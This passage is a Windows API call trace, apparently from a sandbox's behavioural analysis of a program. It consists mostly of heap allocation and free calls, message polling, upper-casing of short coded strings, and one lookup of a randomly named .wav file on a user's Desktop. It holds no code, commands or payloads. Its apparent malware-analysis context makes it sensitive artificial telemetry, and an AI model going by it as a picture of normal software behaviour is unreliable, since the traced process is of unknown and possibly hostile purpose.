Flags=0x0, Size=0x8) returned 0x2a72098 [0099.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0099.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0099.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0099.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0099.717] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0099.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0099.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0099.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0099.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0099.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0099.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0099.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0099.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0099.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0099.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0099.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0099.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0099.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0099.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0099.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0099.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0099.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0099.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0099.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0099.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0099.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0099.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0099.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0099.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0099.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0099.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0099.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0099.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.732] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0099.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0099.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0099.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0099.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0099.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0099.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0099.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0099.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0099.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0099.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0099.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0099.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0099.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0099.735] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/EkLB 1ywsMV77uH53.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 0x9a3b80 [0099.773] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0099.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0099.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0099.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0099.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0099.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0099.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0099.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0099.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.774] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0099.774] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0099.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0099.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0099.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0099.775] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0099.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0099.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0099.775] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0099.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0099.776] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0099.776] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.776] RtlAllocateHeap 